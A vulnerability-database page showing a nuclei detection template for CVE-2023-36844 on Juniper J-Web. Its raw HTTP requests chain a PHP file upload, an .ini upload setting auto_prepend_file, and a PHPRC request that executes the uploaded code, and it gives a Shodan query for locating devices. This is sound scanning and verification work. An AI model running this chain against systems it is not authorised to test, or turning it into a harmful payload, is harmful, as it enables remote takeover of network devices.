Lucene search
K

Juniper Devices - Remote Code Execution

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 125 Views

Juniper Devices PHP vulnerability allows Remote Code Executio

Related
Refs
Code
id: CVE-2023-36844

info:
  name: Juniper Devices - Remote Code Execution
  author: princechaddha,ritikchaddha
  severity: medium
  description: |
    Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices.
  remediation: |
    Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability.
  reference:
    - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/
    - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844
    - https://supportportal.juniper.net/JSA72300
    - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/174865/Juniper-SRX-Firewall-EX-Switch-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-36844
    cwe-id: CWE-473
    epss-score: 0.89628
    epss-percentile: 0.99772
    cpe: cpe:2.3:h:juniper:srx100:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: juniper
    product: srx100
    shodan-query: title:"Juniper Web Device Manager"
  tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev,vuln
variables:
  string: "CVE-2023-36844"
  payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"

http:
  - raw:
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}]
      - |
        POST /webauth_operation.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }]
      - |
        GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"original_fileName":'
          - '"converted_fileName":'
        condition: and

      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        part: body_1
        name: phpfile
        regex:
          - "([a-f0-9]{64}\\.php)"
        internal: true

      - type: regex
        part: body_2
        name: inifile
        regex:
          - "([a-f0-9]{64}\\.ini)"
        internal: true
# digest: 4b0a004830460221008e1ae51a4140037c62c0999231cdba4f7b8e4aeed60f9ed425dfa5fc4289626f022100d5f35d58c6296cab34e4a6a3cdfa447697aba2ef5c8695a5e9541dd8ad4fe3eb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.15.3 - 9.8
EPSS0.94205
SSVC
125